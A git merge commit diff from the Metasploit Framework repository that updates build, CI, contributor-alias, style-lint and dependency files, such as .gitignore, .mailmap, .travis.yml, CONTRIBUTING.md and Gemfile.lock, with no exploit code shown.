Merge for retab

2015-09-16 17:13:08 -05:00 · 2015-09-16 17:13:08 -05:00 · 46168e816b
parent e96717950c c8b27e0563
commit 46168e816b
3089 changed files with 270327 additions and 132643 deletions
--- a/.gitignore
+++ b/.gitignore
@ -7,6 +7,12 @@ Gemfile.local.lock
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
+# Allow for a local choice of (unsupported / semi-supported) ruby versions
+# See PR #4136 for usage, but example usage for rvm:
+#   rvm --create --versions-conf use 2.1.4@metasploit-framework
+# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
+#   rbenv shell 2.1.4
+.versions.conf
 # YARD cache directory
 .yardoc
 # Mac OS X files
@ -60,20 +66,19 @@ external/source/exploits/**/Debug
 external/source/exploits/**/Release

 # Avoid checking in Meterpreter binaries. These are supplied upstream by
-# the meterpreter_bins gem.
-data/meterpreter/elevator.*.dll
-data/meterpreter/ext_server_espia.*.dll
-data/meterpreter/ext_server_extapi.*.dll
-data/meterpreter/ext_server_incognito.*.dll
-data/meterpreter/ext_server_kiwi.*.dll
-data/meterpreter/ext_server_lanattacks.*.dll
-data/meterpreter/ext_server_mimikatz.*.dll
-data/meterpreter/ext_server_priv.*.dll
-data/meterpreter/ext_server_stdapi.*.dll
-data/meterpreter/metsrv.*.dll
-data/meterpreter/screenshot.*.dll
+# the metasploit-payloads gem.
+data/meterpreter/*.dll
+data/meterpreter/*.bin
+data/meterpreter/*.jar
+data/meterpreter/*.lso
+data/android
+data/java

 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
 # check out Metasploit Pro: http://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
+
+# Avoid checking in metakitty, the source for
+# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
+/metakitty
--- a/.mailmap
+++ b/.mailmap
@ -1,30 +1,48 @@
+bcook-r7 <bcook-r7@github>         Brent Cook <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>         <busterb@gmail.com>
 bturner-r7 <bturner-r7@github>     Brandon Turner <brandon_turner@rapid7.com>
+ccatalan-r7 <ccatalan-r7@github>   Christian Catalan <ccatalan@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>   Chris Doughty <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>   Deral Heiland <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com>
 dmaloney-r7 <dmaloney-r7@github>   David Maloney <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
+dmaloney-r7 <dmaloney-r7@github>   dmaloney-r7 <DMaloney@rapid7.com>
 ecarey-r7 <ecarey-r7@github>       Erran Carey <e@ipwnstuff.com>
 farias-r7 <farias-r7@github>       Fernando Arias <fernando_arias@rapid7.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hd_moore@rapid7.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hdm@digitaloffense.net>
-jlee-r7 <jlee-r7@github>           egypt <egypt@metasploit.com> # aka egypt
-jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
-jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
-joev-r7 <joev-r7@github>           joev <joev@metasploit.com>
-joev-r7 <joev-r7@github>           Joe Vennix <Joe_Vennix@rapid7.com>
+jhart-r7 <jhart-r7@github>         Jon Hart <jon_hart@rapid7.com>
+jlee-r7 <jlee-r7@github>           <james_lee@rapid7.com>
+jlee-r7 <jlee-r7@github>           <egypt@metasploit.com> # aka egypt
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan.vazquez@metasploit.com>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan_vazquez@rapid7.com>
+kgray-r7 <kgray-r7@github>         Kyle Gray <kyle_gray@rapid7.com>
 limhoff-r7 <limhoff-r7@github>     Luke Imhoff <luke_imhoff@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <lance.sanchez@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>   darkbushido <lance.sanchez@gmail.com>
+mbuck-r7 <mbuck-r7@github>         Matt Buck <Matthew_Buck@rapid7.com>
+mbuck-r7 <mbuck-r7@github>         Matt Buck <techpeace@gmail.com>
+mschloesser-r7 <mschloesser-r7@github> Mark Schloesser <mark_schloesser@rapid7.com>
+mschloesser-r7 <mschloesser-r7@github> mschloesser-r7 <mark_schloesser@rapid7.com>
+parzamendi-r7 <parzamendi-r7@github> parzamendi-r7 <peter_arzamendi@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github> Sonny Gonzalez <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>   Samuel Huckins <samuel_huckins@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@metasploit.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@packetfu.com>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <Trevor_Rosen@rapid7.com>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <trevor@catapult-creative.com>
-wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
-wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
+wchen-r7 <wchen-r7@github>         <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>         <wei_chen@rapid7.com>
 wvu-r7 <wvu-r7@github>             William Vu <William_Vu@rapid7.com>
 wvu-r7 <wvu-r7@github>             William Vu <wvu@metasploit.com>
 wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>
+wvu-r7 <wvu-r7@github>             wvu-r7 <William_Vu@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@ -34,10 +52,13 @@ wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>
 # let todb@metasploit.com know.

 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
-Brandon Perry <brandonprry@github>     Brandon Perry <bperry.volatile@gmail.com>
-Brandon Perry <brandonprry@github>     Brandon Perry <bperry@bperry-rapid7.(none)>
-Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
-Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
+bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
+bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
+brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
+brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
+brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
+bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
+bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
 Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
@ -51,43 +72,56 @@ efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
 FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
+FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-jcran <jcran@github>                   Jonathan Cran <jcran@0x0e.org>
-jcran <jcran@github>                   Jonathan Cran <jcran@rapid7.com>
-jduck <jduck@github>                   Joshua Drake <github.jdrake@qoop.org>
+jcran <jcran@github>                   <jcran@pwnieexpress.com>
+jcran <jcran@github>                   <jcran@pentestify.com>
+jcran <jcran@github>                   <jcran@0x0e.org>
+jcran <jcran@github>                   <jcran@rapid7.com>
+jduck <jduck@github>                   <github.jdrake@qoop.org>
+jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
+joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
+joevennix <joevennix@github>           <joev@metasploit.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@kernelsmith.com>
+kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@metasploit.com>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
 kost <kost@github>                     Vlatko Kosturjak <kost@linux.hr>
 kris <kris@???>                        kris <>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
-Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
+m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
+Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
-nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk> 
+nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
 nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
+nullbind <nullbind@github>             Scott Sutherland <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
-OJ <oj@github>                         OJ Reeves <oj@buffered.io>
-OJ <oj@github>                         OJ <oj@buffered.io>
+oj <oj@github>                         <oj@buffered.io>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
+r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
+scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
+timwr <timwr@github>                   <timrlw@gmail.com>
+TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
+zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

 # Aliases for utility author names. Since they're fake, typos abound

-Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
--- a/.rubocop.yml
+++ b/.rubocop.yml
@ -8,7 +8,7 @@

 # inherit_from: .rubocop_todo.yml

-Style/ClassLength:
+Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
  Exclude:
@ -25,14 +25,14 @@ Style/Encoding:
  Description: 'We prefer binary to UTF-8.'
  EnforcedStyle: 'when_needed'

-Style/LineLength:
+Metrics/LineLength:
  Description: >-
                  Metasploit modules often pattern match against very
                  long strings when identifying targets.
  Enabled: true
  Max: 180

-Style/MethodLength:
+Metrics/MethodLength:
  Enabled: true
  Description: >-
                  While the style guide suggests 10 lines, exploit definitions
@ -44,6 +44,11 @@ Style/MethodLength:
 Style/Encoding:
  Enabled: false

+# %q() is super useful for long strings split over multiple lines and
+# is very common in module constructors for things like descriptions
+Style/UnneededPercentQ:
+  Enabled: false
+
 Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'
--- a/.ruby-version
+++ b/.ruby-version
@ -1 +1 @@
-1.9.3-p547
+2.1.6
--- a/.travis.yml
+++ b/.travis.yml
@ -1,32 +1,46 @@
+bundler_args: --without coverage development pcap
+cache: bundler
 env:
-  - RAKE_TASK=cucumber
-  - RAKE_TASK=cucumber:boot
-  - RAKE_TASK=spec
+  - RAKE_TASKS="cucumber cucumber:boot"
+  - RAKE_TASKS=spec SPEC_OPTS="--tag content"
+  - RAKE_TASKS=spec SPEC_OPTS="--tag ~content"

 language: ruby
+matrix:
+  fast_finish: true
 before_install:
+  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
  - rake --version
-  - sudo apt-get update -qq
-  - sudo apt-get install -qq libpcap-dev
-  # Uncomment when we have fewer shipping msftidy warnings.
-  # Merge committers will still be checking, just not autofailing.
-  # See https://dev.metasploit.com/redmine/issues/8498
-  # - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
-  # - ls -la ./.git/hooks
-  # - ./.git/hooks/post-merge
+  # Fail build if msftidy is not successful
+  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
+  - ls -la ./.git/hooks
+  - ./.git/hooks/post-merge
 before_script:
  - cp config/database.yml.travis config/database.yml
  - bundle exec rake --version
  - bundle exec rake db:create
  - bundle exec rake db:migrate
-script: "bundle exec rake $RAKE_TASK"
-
+script:
+  # fail build if db/schema.rb update is not committed
+  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
+sudo: false
 rvm:
-  #- '1.8.7'
-  - '1.9.3'
+  - '2.1.6'

 notifications:
  irc: "irc.freenode.org#msfnotify"

 git:
  depth: 5
+
+# Blacklist certain branches from triggering travis builds
+branches:
+  except:
+    - gh-pages
+    - metakitty
+
+addons:
+  postgresql: '9.3'
+  apt:
+    packages:
+      - libpcap-dev
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@ -3,84 +3,111 @@
 Thanks for your interest in making Metasploit -- and therefore, the
 world -- a better place!

-Are you about to report a bug? Sorry to hear it.
-
-Here's our [Issue tracker](https://github.com/rapid7/metasploit-framework/issues).
-Please try to be as specific as you can about your problem, include steps
-to reproduce (cut and paste from your console output if it's helpful), and
+Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
+Please try to be as specific as you can about your problem; include steps
+to reproduce (cut and paste from your console output if it's helpful) and
 what you were expecting to happen.

 Are you about to report a security vulnerability in Metasploit itself?
 How ironic! Please take a look at Rapid7's [Vulnerability
 Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
-your report to security@rapid7.com using [our PGP key](http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D).
+your report to security@rapid7.com using our [PGP key].

 Are you about to contribute some new functionality, a bug fix, or a new
 Metasploit module? If so, read on...

 # Contributing to Metasploit

-What you see here in CONTRIBUTING.md is a bullet-point list of the do's
+What you see here in CONTRIBUTING.md is a bullet point list of the do's
 and don'ts of how to make sure *your* valuable contributions actually
 make it into Metasploit's master branch.

 If you care not to follow these rules, your contribution **will** be
-closed (*Road House* style). Sorry!
+closed. Sorry!

-This is intended to be a **short** list. The
-[wiki](https://github.com/rapid7/metasploit-framework/wiki) is much more
+This is intended to be a **short** list. The [wiki] is much more
 exhaustive and reveals many mysteries. If you read nothing else, take a
-look at the standard [development environment setup
-guide](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment)
-and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes).
+look at the standard [development environment setup] guide
+and Metasploit's [Common Coding Mistakes].

 ## Code Contributions

-* **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
-* *Do* get [Rubocop](https://rubygems.org/search?query=rubocop) relatively quiet against the code you are adding or modifying.
-* **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
-* **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.
+* **Do** stick to the [Ruby style guide].
+* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
+* **Do** follow the [50/72 rule] for Git commit messages.
+* **Don't** use the default merge messages when merging from other branches.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.

 ### Pull Requests

 * **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output](https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks), especially for witnessable effects in `msfconsole`.
-* **Do** list [verification steps](https://help.github.com/articles/writing-on-github#task-lists) so your code is testable.
+* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** list [verification steps] so your code is testable.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

-Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940) and [#3043](https://github.com/rapid7/metasploit-framework/pull/3043) are a couple good examples to follow.
+Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.

 #### New Modules

-* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
-* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
+* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up.
+  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
+* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.

+#### Scripts
+
+* **Don't** submit new [scripts].  Scripts are shipped as examples for
+  automating local tasks, and anything "serious" can be done with post
+  modules and local exploits.
+
 #### Library Code

-* **Do** write [RSpec](http://rspec.info/) tests - even the smallest change in library land can thoroughly screw things up.
-* **Do** follow [Better Specs](http://betterspecs.org/) - it's like the style guide for specs.
-* **Do** write [YARD](http://yardoc.org/) documentation - this makes it easier for people to use your code.
+* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
+* **Do** follow [Better Specs] - it's like the style guide for specs.
+* **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

 #### Bug Fixes

 * **Do** include reproduction steps in the form of verification steps.
-* **Do** include a link to any corresponding [Issue](https://github.com/rapid7/metasploit-framework/issues) in the format of `See #1234` in your commit description.
+* **Do** include a link to any corresponding [Issues] in the format of
+  `See #1234` in your commit description.

 ## Bug Reports

 * **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
-* **Don't** file duplicate reports - search for your bug before filing a new report.
+* **Don't** file duplicate reports; search for your bug before filing a new report.

 If you need some more guidance, talk to the main body of open
-source contributors over on the [Freenode IRC channel](http://webchat.freenode.net/?channels=%23metasploit&uio=d4)
-or e-mail us at [metasploit-hackers](https://lists.sourceforge.net/lists/listinfo/metasploit-hackers)
-mailing list.
+source contributors over on the [Freenode IRC channel],
+or e-mail us at the [metasploit-hackers] mailing list.

 Also, **thank you** for taking the few moments to read this far! You're
 already way ahead of the curve, so keep it up!
+
+[Issue Tracker]:http://r-7.co/MSF-BUGv1
+[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
+[wiki]:https://github.com/rapid7/metasploit-framework/wiki
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
+[development environment setup]:http://r-7.co/MSF-DEV
+[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
+[Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
+[Rubocop]:https://rubygems.org/search?query=rubocop
+[50.72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
+[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
+[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
+[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
+[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
+[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
+[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
+[API]:https://rapid7.github.io/metasploit-framework/api
+[RSpec]:http://rspec.info
+[Better Specs]:http://betterspecs.org
+[YARD]:http://yardoc.org
+[Issues]:https://github.com/rapid7/metasploit-framework/issues
+[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
--- a/2
+++ b/2
@ -1,4 +1,4 @@
-Copyright (C) 2006-2013, Rapid7, Inc.
+Copyright (C) 2006-2015, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
--- a/34
+++ b/34
@ -1,18 +1,18 @@
 source 'https://rubygems.org'
 # Add default group gems to `metasploit-framework.gemspec`:
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
-gemspec
+gemspec name: 'metasploit-framework'
+
+# separate from test as simplecov is not run on travis-ci
+group :coverage do
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
+  gem 'simplecov'
+end

 group :db do
-  # Needed for Msf::DbManager
-  gem 'activerecord', '>= 3.0.0', '< 4.0.0'
-
-  # Metasploit::Credential database models
-  gem 'metasploit-credential', '~> 0.12.0'
-  # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.21.1'
-  # Needed for module caching in Mdm::ModuleDetails
-  gem 'pg', '>= 0.11'
+  gemspec name: 'metasploit-framework-db'
 end

 group :development do
@ -25,12 +25,8 @@ group :development do
 end

 group :development, :test do
-  # supplies factories for producing model instance for specs
-  # Version 4.1.0 or newer is needed to support generate calls without the
-  # 'FactoryGirl.' in factory definitions syntax.
-  gem 'factory_girl', '>= 4.1.0'
  # automatically include factories from spec/factories
-  gem 'factory_girl_rails'
+  gem 'factory_girl_rails', '~> 4.5.0'
  # Make rspec output shorter and more useful
  gem 'fivemat', '1.2.1'
  # running documentation generation tasks and rspec tasks
@ -43,9 +39,7 @@ group :development, :test do
 end

 group :pcap do
-  gem 'network_interface', '~> 0.0.1'
-  # For sniffer and raw socket modules
-  gem 'pcaprub'
+  gemspec name: 'metasploit-framework-pcap'
 end

 group :test do
@ -54,10 +48,6 @@ group :test do
  # cucumber + automatic database cleaning with database_cleaner
  gem 'cucumber-rails', :require => false
  gem 'shoulda-matchers'
-  # code coverage for tests
-  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
-  gem 'simplecov', '0.5.4', :require => false
  # Manipulate Time.now in specs
  gem 'timecop'
 end
--- a/Gemfile.lock
+++ b/Gemfile.lock
@ -1,183 +1,198 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.10.1.pre.dev)
-      actionpack (< 4.0.0)
-      activesupport (>= 3.0.0, < 4.0.0)
+    metasploit-framework (4.11.4)
+      actionpack (>= 4.0.9, < 4.1.0)
+      activesupport (>= 4.0.9, < 4.1.0)
      bcrypt
      jsobfu (~> 0.2.0)
      json
-      metasploit-concern (~> 0.3.0)
-      metasploit-model (~> 0.28.0)
-      meterpreter_bins (= 0.0.10)
+      metasm (~> 1.0.2)
+      metasploit-concern (= 1.0.0)
+      metasploit-model (= 1.0.0)
+      metasploit-payloads (= 1.0.12)
      msgpack
      nokogiri
-      packetfu (= 1.1.9)
+      packetfu (= 1.1.11)
      railties
-      recog (~> 1.0)
+      rb-readline-r7
+      recog (= 2.0.6)
      robots
      rubyzip (~> 1.1)
      sqlite3
      tzinfo
+    metasploit-framework-db (4.11.4)
+      activerecord (>= 4.0.9, < 4.1.0)
+      metasploit-credential (= 1.0.1)
+      metasploit-framework (= 4.11.4)
+      metasploit_data_models (= 1.2.5)
+      pg (>= 0.11)
+    metasploit-framework-pcap (4.11.4)
+      metasploit-framework (= 4.11.4)
+      network_interface (~> 0.0.1)
+      pcaprub

 GEM
  remote: https://rubygems.org/
  specs:
-    actionmailer (3.2.19)
-      actionpack (= 3.2.19)
-      mail (~> 2.5.4)
-    actionpack (3.2.19)
-      activemodel (= 3.2.19)
-      activesupport (= 3.2.19)
-      builder (~> 3.0.0)
+    actionmailer (4.0.13)
+      actionpack (= 4.0.13)
+      mail (~> 2.5, >= 2.5.4)
+    actionpack (4.0.13)
+      activesupport (= 4.0.13)
+      builder (~> 3.1.0)
      erubis (~> 2.7.0)
-      journey (~> 1.0.4)
-      rack (~> 1.4.5)
-      rack-cache (~> 1.2)
-      rack-test (~> 0.6.1)
-      sprockets (~> 2.2.1)
-    activemodel (3.2.19)
-      activesupport (= 3.2.19)
-      builder (~> 3.0.0)
-    activerecord (3.2.19)
-      activemodel (= 3.2.19)
-      activesupport (= 3.2.19)
-      arel (~> 3.0.2)
-      tzinfo (~> 0.3.29)
-    activeresource (3.2.19)
-      activemodel (= 3.2.19)
-      activesupport (= 3.2.19)
-    activesupport (3.2.19)
-      i18n (~> 0.6, >= 0.6.4)
-      multi_json (~> 1.0)
-    arel (3.0.3)
-    arel-helpers (2.0.1)
+      rack (~> 1.5.2)
+      rack-test (~> 0.6.2)
+    activemodel (4.0.13)
+      activesupport (= 4.0.13)
+      builder (~> 3.1.0)
+    activerecord (4.0.13)
+      activemodel (= 4.0.13)
+      activerecord-deprecated_finders (~> 1.0.2)
+      activesupport (= 4.0.13)
+      arel (~> 4.0.0)
+    activerecord-deprecated_finders (1.0.4)
+    activesupport (4.0.13)
+      i18n (~> 0.6, >= 0.6.9)
+      minitest (~> 4.2)
+      multi_json (~> 1.3)
+      thread_safe (~> 0.1)
+      tzinfo (~> 0.3.37)
+    arel (4.0.2)
+    arel-helpers (2.1.0)
      activerecord (>= 3.1.0, < 5)
-    aruba (0.6.1)
+    aruba (0.6.2)
      childprocess (>= 0.3.6)
      cucumber (>= 1.1.1)
      rspec-expectations (>= 2.7.0)
-    bcrypt (3.1.7)
-    builder (3.0.4)
-    capybara (2.4.1)
+    bcrypt (3.1.10)
+    builder (3.1.4)
+    capybara (2.4.4)
      mime-types (>= 1.16)
      nokogiri (>= 1.3.3)
      rack (>= 1.0.0)
      rack-test (>= 0.5.4)
      xpath (~> 2.0)
-    childprocess (0.5.3)
+    childprocess (0.5.5)
      ffi (~> 1.0, >= 1.0.11)
    coderay (1.1.0)
-    cucumber (1.2.1)
+    cucumber (1.3.19)
      builder (>= 2.1.2)
      diff-lcs (>= 1.1.3)
-      gherkin (~> 2.11.0)
-      json (>= 1.4.6)
-    cucumber-rails (1.4.0)
-      capybara (>= 1.1.2)
-      cucumber (>= 1.2.0)
-      nokogiri (>= 1.5.0)
-      rails (>= 3.0.0)
+      gherkin (~> 2.12)
+      multi_json (>= 1.7.5, < 2.0)
+      multi_test (>= 0.1.2)
+    cucumber-rails (1.4.2)
+      capybara (>= 1.1.2, < 3)
+      cucumber (>= 1.3.8, < 2)
+      mime-types (>= 1.16, < 3)
+      nokogiri (~> 1.5)
+      rails (>= 3, < 5)
    diff-lcs (1.2.5)
+    docile (1.1.5)
    erubis (2.7.0)
-    factory_girl (4.4.0)
+    factory_girl (4.5.0)
      activesupport (>= 3.0.0)
-    factory_girl_rails (4.4.1)
-      factory_girl (~> 4.4.0)
+    factory_girl_rails (4.5.0)
+      factory_girl (~> 4.5.0)
      railties (>= 3.0.0)
-    ffi (1.9.3)
+    ffi (1.9.8)
    fivemat (1.2.1)
-    gherkin (2.11.6)
-      json (>= 1.7.6)
+    gherkin (2.12.2)
+      multi_json (~> 1.3)
    hike (1.2.3)
-    i18n (0.6.11)
-    journey (1.0.4)
+    i18n (0.7.0)
